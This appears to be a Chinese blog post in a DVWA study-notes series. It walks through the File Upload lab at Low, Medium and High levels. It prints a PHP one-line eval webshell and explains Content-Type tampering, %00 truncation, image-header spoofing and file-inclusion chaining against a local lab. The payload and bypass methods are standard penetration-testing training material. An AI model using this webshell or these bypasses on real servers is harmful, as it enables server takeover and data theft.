DVWA-File Upload(文件上传)

本系列文集:DVWA学习笔记

文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。

Low:
clipboard.png

函数介绍:
basename()函数返回路径中的文件名部分。
string basename ( string $path [, string $suffix ] )

参数介绍:
$path:必需。规定要检查的路径。在Windows中,斜线(/)和反斜线(\)都可以用作目录分隔符。在其它环境下是斜线(/)。
$suffix:可选。规定文件扩展名。如果文件有suffix,则不会输出这个扩展名。

举例:
<?php $path = "/testweb/home.php"; //显示带有文件扩展名的文件名 echo basename($path); //显示不带有文件扩展名的文件名 echo basename($path,".php"); ?>

输出:
home.php home
文件上传漏洞的利用的条件:
 1.能够成功上传木马文件
 2.上传文件必须能够被执行
 3.上传文件的路径必须可知

漏洞利用
因为对于上面的利用条件全都满足,直接上传文件x.php(一句话木马)
<?php @eval($_POST['x']);?>

clipboard (1).png

上传成功得到路径:
http://127.0.0.1/DVWA-1.9/hackable/uploads/x.php 密码为_POST['x']中的x
菜刀连接:就可以操控文件夹,干坏事了

clipboard (2).png

clipboard (3).png

Medium:

clipboard (4).png

分析:
Medium的代码对上传文件的类型、大小做了限制,要求文件类型必须是jpeg或者png,大小不能超过 100000B(约为 97.6KB)
普通上传一个php文件时,出现报错提示:

clipboard (5).png

漏洞利用
1.抓包修改文件类型
上传x.png文件,使用Burpsuite抓包:

clipboard (6).png
clipboard (7).png

可以看到文件类型为image/png,尝试修改filename为x.php,
clipboard (8).png

上传成功:

clipboard (10).png

上传后成功得到x.php文件:

clipboard (9).png

菜刀连接:http://127.0.0.1/hackable/uploads/x.php
2.%00 截断上传绕过
在php版本小于 5.3.4 的服务器中,当magic_quote_gpc选项为off时,可以在文件名中使用%00截断,所以可以把上传文件命名为x.php%00.png。

180320195942.png

可以看到,包中的文件类型为image/png,可以通过文件类型检查。点击上传后:

180320195412.png

服务器会认为其文件名为x.php,顺势解析为php文件。
菜刀连接:http://127.0.0.1/hackable/uploads/x.php%00.png

180320184800.png

3.文件上传+文件包含
因为采用的是一句话木马,所以文件大小符合要求,至于文件类型的检查,尝试修改文件名为x.png,上传成功:

180320101057.png

但不能解析识别出是PHP文件,菜刀连接报错。
此时我们想到文件包含漏洞的利用。这里可以借助Medium 的文件包含漏洞来获取webshell权限,利用方式如下:
本地文件包含:成功读取x.png文件内容
http://127.0.0.1/vulnerabilities/fi/?page=D:/phpStudy/PHPTutorial/WWW/hackable/uploads/x.png
远程文件包含:
http://127.0.0.1/vulnerabilities/fi/?page=hthttp://tp://127.0.0.1/hackable/uploads/x.png
成功获取webshell权限:

180320184800 (1).png

两种方式,菜刀均可以成功连接。
adandinclude.png

High:

clipboard (11).png
strrpos()函数:

strrpos(string,find,start)

函数返回字符串find在另一字符串string中最后一次出现的位置,如果没有找到字符串则返回false,可选参数start规定在何处开始搜索。

strtolower()函数:

strtolower(string)

把字符串转换为小写。

getimagesize()函数:

getimagesize(string filename)

getimagesize()函数用于获取图像大小及相关信息,成功则返回一个数组,失败则返回FALSE并产生一条E_WARNING级的错误信息。

函数详细参考:
PHP strrpos() 函数
PHP getimagesize 函数
分析:
High的代码读取文件名中最后一个”.”后的字符串,通过文件名来限制文件类型因此要求上传文件名形式必须是.jpg、.jpeg 、*.png三者之一。getimagesize()函数更是限制了上传文件的文件头必须为图像类型。
Exploit
利用思路主要是:绕过getimagesize()函数检测识别和上传文件名的检测识别
让getimagesize()函数检测无效的方法:文件头欺骗,继而使得getimagesize()函数无法判断。

文件头相关的知识:

常见的图片格式的文件头标识如下:
JPEG/JPG - 文件头标识 (2 bytes): FF D8 (SOI) (JPEG 文件标识) - 文件结束标识 (2 bytes): FF D9 (EOI) 

PNG - 文件头标识 (8 bytes) :  89 50 4E 47 0D 0A 1A 0A

GIF - 文件头标识 (6 bytes) :  47 49 46 38 39(37) 61 

更多文件头标识参见文章:通过文件头标识判断图片格式

文件头欺骗:伪造文件头,使文件头标识一样,其它部分我们修改为一句话木马,也就成了我们常说的图片一句话。

常见的图片一句话制作方法:
先用C32Asm十六进制模式打开y.png,然后将x.php拖入,然后另存为z.png

180320220559.png

之后,我们将制作好的图片一句话,用getimagesize()函数识别测试,并与原图片文件对比,打印输出:

<?php

header("Content-type: text/html; charset=utf-8"); 

echo "y.png:";

$array0 = getimagesize("images/y.png");
print_r($array0);

echo "<br />";

echo "copy 命令制作的图片一句话 z1.png:";

$array1 = getimagesize("images/z1.png");
print_r($array1);

echo "C32Asm 制作的图片一句话 z2.png:";

$array2 = getimagesize("images/z2.png");
print_r($array2);
?>

以上是打印输出的file.php文件。

180321075814.png

我们发现得到的数组内容没有丝毫改变,
从而证明了该方法可以绕过getimagesize()函数的检测识别。接着我们再来进行利用:

1.%00 截断上传绕过
采用%00截断的方法可以轻松绕过文件名的检查,采用刚才的图片一句话进行上传。(适用于php小于 5.3.4 版本)
菜刀连接:http://127.0.0.1/hackable/uploads/z.php%00.png

2.文件上传 + 文件包含
通过上传图片一句话和借助High的文件包含漏洞来进行利用:
菜刀连接:
http://127.0.0.1/vulnerabilities/fi/?page=file:///D:/phpStudy/PHPTutorial/WWW/hackable/uploads/z.png

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 205,033评论 6 478
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 87,725评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 151,473评论 0 338
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,846评论 1 277
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,848评论 5 368
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,691评论 1 282
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 38,053评论 3 399
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,700评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 42,856评论 1 300
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,676评论 2 323
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,787评论 1 333
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,430评论 4 321
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 39,034评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,990评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,218评论 1 260
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 45,174评论 2 352
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,526评论 2 343

推荐阅读更多精彩内容